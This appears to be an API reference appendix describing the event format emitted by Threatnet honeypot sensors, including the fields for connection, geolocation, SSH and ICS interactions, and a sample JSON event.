API Reference
API Documentation
Appendix
Threatnet Event Specification
An event is emitted for every interaction picked up by a Threatnet sensor. It serializes all the requests/ responses and adds additional information about the connecting host such as where it is located.
Properties
- src_ip
- [String] The IP address of the host as a string.
- src_port
- [Integer] The source port that the connecting host is sending data from.
- dst_port
- [Integer] The destination port number that the source host is connecting to.
- timestamp
- [String] The timestamp for when the event was triggered on the sensor. Example: "2014-01-15T05:49:56.283713"
- shodan
- [Object] Contains information that describes the sensor, such as where it is located, whether it uses default configurations or is hosted in the cloud.
- shodan.location
- [Object] An object containing all of the location information for the sensor.
- shodan.tags
- [String[]] A list of tags that describe the type of sensor, can include tags such as:
Optional Properties
- asn
- [String] The autonomous system number (ex. "AS4837").
- data
- [String] A base64-encoded string containing raw packet content.
- domains
- [String[]] An array of strings containing the top-level domains for the hostnames of the device. This is a utility property in case you want to filter by TLD instead of subdomain. It is smart enough to handle global TLDs with several dots in the domain (ex. "co.uk")
- hostnames
- [String[]] An array of strings containing all of the hostnames that have been assigned to the IP address for this device.
- ics
- [Object] An object containing information about the interaction performed on a sensor that is emulating an industrial control system.
- ics.request
- [String] The command/ request that was sent to the ICS sensor.
- ics.response
- [String] The response from the ICS sensor.
- ics.session
- [String] A unique session ID to identify the series of interactions a host has with the sensor.
- isp
- [String] The ISP that is providing the organization with the IP space for the source IP. Consider this the "parent" of the organization in terms of IP ownership.
- location
- [Object] An object containing all of the location information for the connecting host.
- location.area_code
- [Integer] The area code for the device's location. Only available for the US.
- location.city
- [String] The name of the city where the device is located.
- location.country_code
- [String] The 2-letter country code for the device location.
- location.country_code3
- [String] The 3-letter country code for the device location.
- location.country_name
- [String] The name of the country where the device is located.
- location.dma_code
- [Integer] The designated market area code for the area where the device is located. Only available for the US.
- location.latitude
- [Double] The latitude for the geolocation of the device.
- location.longitude
- [Double] The longitude for the geolocation of the device.
- location.postal_code
- [String] The postal code for the device's location.
- location.region_code
- [String] The name of the region where the device is located.
- org
- [String] The name of the organization that is assigned the IP space for the source IP.
- ssh
- [Object] An list of properties that describe the interaction performed with the SSH service.
- ssh.password
- [String] The password that was attempted to login.
- ssh.session
- [String] A unique session ID to identify the series of interactions a host has with the sensor.
- ssh.type
- [String] The type of interaction that was performed, such as: NEW_CONNECTION, VALID_COMMAND, FILE_DOWNLOAD, CLOSED_CONNECTION etc.
- ssh.url
- The URL location for a file that the user downloaded using a tool such as wget.
- ssh.username
- [String] The username that was attempted to login.
Sample Event
{
"src_port": 77,
"proto": "tcp",
"timestamp": "2015-01-07T02:12:04.688228083Z",
"isp": "China Telecom jiangsu",
"src_ip": "222.186.56.177",
"dst_port": 3128,
"org": "China Telecom jiangsu province backbone",
"shodan": {
"org": "Digital Ocean",
"isp": "Digital Ocean",
"location": {
"city": "New York",
"region_code": "NY",
"area_code": 212,
"time_zone": "America/New_York",
"dma_code": 501,
"metro_code": "New York, NY",
"country_code3": "USA",
"latitude": 40.72139999999999,
"postal_code": "10013",
"longitude": -74.0052,
"country_code": "US",
"country_name": "United States",
"continent": "NA"
},
"tags": [
"cloud",
"backscatter"
]
},
"asn": "AS23650",
"location": {
"city": "Nanjing",
"region_code": "04",
"area_code": 0,
"time_zone": "Asia/Shanghai",
"dma_code": 0,
"metro_code": null,
"country_code3": "CHN",
"latitude": 32.0617,
"postal_code": null,
"longitude": 118.77780000000001,
"country_code": "CN",
"country_name": "China",
"continent": "AS"
}
}